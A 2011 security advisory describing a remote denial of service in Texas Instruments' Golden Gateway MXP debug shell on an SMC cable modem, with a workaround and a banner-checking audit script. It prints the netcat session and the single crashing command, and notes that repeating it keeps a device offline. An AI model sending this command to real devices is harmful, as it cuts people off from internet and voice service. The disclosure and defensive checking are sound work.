#######################################################################

                             Will Urbanski

Application:    Texas Instruments Golden Gateway MXP Debug Application
                http://www.ti.com

Vuln ID:        SHR20111201
                
Version:        2007

Platforms:      Embedded (tested on SMC D3GNV Cable Modem)

Bug:            input sanitization DoS vuln in `show rtcp_info`

Exploitation:   remote
Date:           01 Dec 2011
Author:         Will Urbanski
                e-mail: will () shakingrock com
                permalink:      http://www.shakingrock.com/vulns/SHR20111201.txt


#######################################################################


1) Introduction
2) `show rtcp_info`
3) Impact
4) Workaround


#######################################################################

===============
1) Introduction
===============

From the vendor's homepage:
"Golden Gateway® software is designed to run on Texas Instruments (TI) Digital 
Signal Processors (DSPs). The software, which powers voice, fax and data modem 
transmission over the Internet, is inside products made by industry leaders 
such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and 
data communications equipment manufacturers."

#######################################################################

===================
2) `show rtcp_info`
===================

Executing `show rtcp_info 1` results in system failure because a critical 
process is terminated. The show command is normally used to display system 
information and should not result in application termination.

$ nc 172.16.1.1 4159
����!����Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXP>show version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXP>show rtcp_info 1
show rtcp_info 1
MXP>sigterm_prog=0;calling vp880_restart

The DoS can be initiated remotely by simply sending "show rtcp_info 1" to the 
MXP shell. During some of our tests we were unable to regain internet 
connectivity until the device had been unplugged. In the event that 
connectivity is restored, spamming "show rtcp_info 1" to the MXP shell will 
ensure the device stays offline.


#######################################################################

===========
3) Impact
===========

As mentioned on the vendor's site, the Golden Gateway Remote Command Processor 
MXP Debug Application is included in many embedded networking devices. "The 
software, which powers voice, fax and data modem transmission over the 
Internet, is inside products made by industry leaders such as Cisco Systems, 
3Com, Nortel Networks and many other leading voice and data communications 
equipment manufacturers." This remote denial of service was discovered in an 
SMC D3GNV DOCSIS 3.0 Multimedia Voice Gateway which provides voice, wifi, and 
cable internet capabilities. This vulnerability _may_ be found on any device 
that allows unauthenticated access to the MXP Debug Application shell.


#######################################################################

==============
4) Workaround
==============

Restrict access to port tcp/4159 on devices that are allowing unauthenticated 
access to the MXP Debug Application.
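
One way to verify the workaround from the network segment that should be 
blocked (an added example, not part of the original advisory): the script 
connects to tcp/4159, reads the banner the service volunteers, and sends 
nothing. The function names and the host list passed on the command line are 
this example's own assumptions.

```python
import socket
import sys

MXP_PORT = 4159  # tcp port named in the advisory
# Strings from the banner in the advisory's session capture.
MXP_MARKERS = (b"Golden Gateway Remote Command Processor", b"MXP>")


def classify_banner(data):
    """Label bytes read from the port: MXP shell banner or something else."""
    if any(marker in data for marker in MXP_MARKERS):
        return "mxp-exposed"
    return "open-unknown"


def grab_banner(host, port=MXP_PORT, timeout=3.0):
    """Connect and read what the service volunteers; nothing is sent.

    Returns the bytes read, or None if the port is closed or filtered.
    """
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return None
    data = b""
    with sock:
        try:
            while len(data) < 512 and b"MXP>" not in data:
                chunk = sock.recv(512)
                if not chunk:
                    break
                data += chunk
        except OSError:
            pass  # timeout or reset: classify whatever arrived
    return data


def audit(hosts, fetch=grab_banner):
    """Map each host to 'restricted', 'mxp-exposed' or 'open-unknown'."""
    results = {}
    for host in hosts:
        banner = fetch(host)
        results[host] = "restricted" if banner is None else classify_banner(banner)
    return results


if __name__ == "__main__":
    for host, status in audit(sys.argv[1:]).items():
        print(f"{host}\ttcp/{MXP_PORT}\t{status}")
```

A result of "restricted" only describes the vantage point the script ran 
from, so run it from each network that is not supposed to reach the shell.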
